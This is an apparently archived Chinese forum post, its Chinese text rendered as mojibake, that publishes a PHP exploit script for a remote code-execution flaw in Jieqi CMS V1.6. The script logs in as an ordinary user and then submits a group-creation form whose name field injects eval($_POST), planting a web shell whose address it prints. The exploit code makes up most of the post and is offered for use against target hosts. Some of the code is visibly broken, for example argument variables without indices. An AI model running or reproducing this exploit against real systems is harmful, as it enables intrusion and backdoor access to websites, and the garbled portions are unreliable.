Jieqi(½ÜÆæ)CMS V1.6 PHP´úÂëÖ´ÐÐ0dayÂ©¶´EXP

admin ·¢±íÓÚ 2013-2-23 11:28:09

½ÜÆæÍøÕ¾¹ÜÀíÏµÍ³£¨¼ò³Æ JIEQI CMS£¬ÖÐ¹ú¹ú¼Ò°æÈ¨¾ÖÖø×÷È¨µÇ¼ÇºÅ£º2006SR03382£©ÊÇÒ»Ì×Ä£¿é»¯µÄÍøÕ¾¼ÜÉèÏµÍ³£¬¾ß±¸¼òµ¥Áé»î¡¢ÐÔÄÜ×¿Ô½¡¢°²È«¿É¿¿µÈÌØÐÔ¡£ÎÒÃÇÎª´ó¼ÒÌá¹©ÁËÄ¿Ç°×îÁ÷ÐÐµÄ½ÜÆæÐ¡ËµÁ¬ÔØÏµÍ³¡¢½ÜÆæÔ´´Âþ»ÏµÍ³¼°Êý×Ö³ö°æ½â¾ö·½°¸£¬²¢Ìá¹©¸÷ÀàÍøÕ¾¶¨ÖÆ·þÎñ¡£

¸ÃÏµÍ³´æÔÚ¶à¸öÔ¶³Ì°²È«Â©¶´£¬½ñÌì±¨¸æµÄÕâ¸öÊÇ1.6°æ±¾µÄÒ»¸öÔ¶³Ì´úÂëÖ´ÐÐÂ©¶´£¬Ó¦¸ÃÓÐ2Äê¶àÀúÊ·ÁË¡£
ÐèÒªÓÐÒ»¸öÄÜ´´½¨È¦×ÓµÄÓÃ»§¡£

<?php

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
'); /**
* works regardless of php.ini settings
*/ if ($argc < 5) { print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv.' host path username
host: target server (ip/hostname)
path: path to jieqicms
uasename:a username who can create group
Example:
php '.$argv.' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv; $path = $argv; $username = $argv; $password = $argv; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
Content-Disposition: form-data; name="gname"

'; $params .="';"; $params .='eval($_POST);//flyh4t
-----------------------------23281168279961
Content-Disposition: form-data; name="gcatid"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gaudit"

1
-----------------------------23281168279961
Content-Disposition: form-data; name="gbrief"

1
-----------------------------23281168279961--
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs¾ÍÊÇ·µ»ØµÄÄÚÈÝ ob_clean(); www.2cto.com

preg_match('/g=({1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

Jieqi(½ÜÆæ)CMS V1.6 PHP´úÂëÖ´ÐÐ0dayÂ©¶´EXP